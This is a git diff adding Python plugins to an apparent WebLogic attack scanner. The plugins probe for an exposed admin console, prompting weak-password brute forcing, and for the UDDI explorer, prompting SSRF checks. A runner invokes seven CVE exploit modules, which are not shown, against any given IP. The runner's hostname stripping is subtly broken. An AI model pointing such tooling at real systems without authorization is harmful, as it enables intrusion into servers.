z^}W4%d#}F#>HarQ#@jzHdNA(r>2Ce(&huY?>)qNk{oSXBcOM@<{G#5wf4KW~{l`!B zy+_Y~|L$PxvxA){i^VIr{L)L7-+sLR`LlX!Z?SC~qZFD`IhpDwdDZv`Eo_%t20I4l9-_lCzL#7l44{3-lCIXOMC^A4UCy^D(^WWQ?A)XR9XXB8@qR+qABg z14VO(Ci_q4CDBO25Ia(#)lka7BE7S@3-kbNm$$NbBc2A9t+5}eBeeV4* z2>FSd;etIm32)K>5Tro_6|6-Yw6Ltfgdxn3HVjb`<#p09MMYR(OR_9RZZLI8(xr;9 z50Hi>M+(1sfZU@ETb86H?R$(8!4^n;k3T{Qu^kS}>94*WB3h(&XiO?dJ444qhG$L& zrjHZ64m%({*MShy0GI*>4rRc*4!;WfLvVhG$O7rP00j+z0oQT+m1doZ;v;yz{}sTZ z64XK$X%EVI(BZ6OV-FsOz!9GDDbC#?W)LeH1Q^i3qHp&=Z8E=Vr-@XPep7bzYBi9_ zV(3m!O-~&S81k^p!Fw8PG7TW8CK(7k2C|M3@M+;2V`PnKy2LW3;lduWH6t^YOc1^_ zzgk(;I-YUeKXhib=B7e~@^;*clvHk==9NY13#pQNDK`?Wa!bjZsZ4Z|8%?Pd4oF^2 zw6D{I2a%9P`gSAs=fwI^d0Ey+N8^ONU7AzJd5 zujE4Dcm5B=t+W|-67QD0){2^8z~diSf?l9$7z6)wxYs6rWl(1WzbR1Lfx zsZcWH3aL(kgF=BkOi-B9;~M7r1x&Lx2J)F8pD~cHG)7*6kd$;R$Sb2K2#8mi?|p|a zrRM=IAHMSY$@}dW_lIq6y?ea%^!3HLxwF4F*MDt(9Je8*`)OnA+xoB1UuN#C75j}( z-TQC5FCX;YKIm@TU0AqqX8Y@-?GMk!cdkWY=esW^J%%MGca?PhRqJg&?!JFDEcdYA z%y``_M9E9B3OhP4UyoGV*9ym|&J_L)s1XFbtv-x`mm4bW><4EcZjDYbwGRo4^R^#$ zIPbx)m-MjHdNr?bE~0>Q7?_nrl^|G*Nl|*|T*q%qNHKlYTrMi-2DG%he9=hJgEiZZ YMB0)ku*(Fio7AEfgQpA+wP}t11w!CcPyhe` literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/managerURL200.py b/plugins/weblogic_poc/managerURL200.py new file mode 100644 index 0000000..7530763 --- /dev/null +++ b/plugins/weblogic_poc/managerURL200.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import sys +import requests + +headers = {'user-agent': 'ceshi/0.0.1'} + +def islive(ur,port): + url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp' + r = requests.get(url, headers=headers) + return r.status_code + +def run(url,port): + if islive(url,port)==200: + u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp' + print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u))) + else: + print("[-]目标weblogic控制台地址未找到!") + +if __name__=="__main__": + url = sys.argv[1] + port = int(sys.argv[2]) + run(url,port) + # run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/uddi_ssrf.py b/plugins/weblogic_poc/uddi_ssrf.py new file mode 100644 index 0000000..282bbcb --- /dev/null +++ b/plugins/weblogic_poc/uddi_ssrf.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import sys +import requests + +headers = {'user-agent': 'ceshi/0.0.1'} + +def islive(ur,port): + url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/' + r = requests.get(url, headers=headers) + # print(url,r.status_code) + return r.status_code + +def run(url,port): + if islive(url,port)==200: + print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/'))) + else: + print("[-]目标weblogic UDDI组件默认路径不存在!") + +if __name__=="__main__": + url = sys.argv[1] + port = int(sys.argv[2]) + run(url,port) \ No newline at end of file diff --git a/plugins/weblogic_special_plugin_.py b/plugins/weblogic_special_plugin_.py new file mode 100644 index 0000000..81dfa86 --- /dev/null +++ b/plugins/weblogic_special_plugin_.py @@ -0,0 +1,51 @@ +#coding=utf-8 +from plugins.weblogic_poc import CVE_2015_4852 +from plugins.weblogic_poc import CVE_2016_0638 +from plugins.weblogic_poc import CVE_2016_3510 +from plugins.weblogic_poc import CVE_2017_3248 +from plugins.weblogic_poc import CVE_2017_3506 +from plugins.weblogic_poc import CVE_2018_2628 +from plugins.weblogic_poc import CVE_2018_2893 +from plugins.weblogic_poc import managerURL200 +from plugins.weblogic_poc import uddi_ssrf +import socket +def weblogic_special_plugin_(arg,config): + port=7001 + ip=socket.gethostbyname(arg.url.strip("http://").strip("https://")) + #print(arg.url) + try: + CVE_2015_4852.run(ip,port) + except Exception: + print("CVE_2015_4852 脚本出错") + try: + CVE_2016_0638.run(ip,port,0) + except Exception: + print("CVE_2016_0638 脚本出错") + try: + CVE_2016_3510.run(ip,port,0) + except Exception: + print("CVE_2016_3510 脚本出错") + try: + CVE_2017_3248.run(ip,port,0) + except Exception: + print("CVE_2017_3248 脚本出错") + try: + CVE_2017_3506.run(ip,port) + except Exception: + print("CVE_2017_3506 脚本出错") + try: + CVE_2018_2893.run(ip,port,0) + except Exception: + print("CVE_2018_2893 脚本出错") + try: + CVE_2018_2628.run(ip,port,0) + except Exception: + print("CVE_2018_2628 脚本出错") + try: + managerURL200.run(ip,port) + except Exception: + print("managerURL200 脚本出错") + try: + uddi_ssrf.run(ip,port) + except Exception: + print("uddi_ssrf 脚本出错") \ No newline at end of file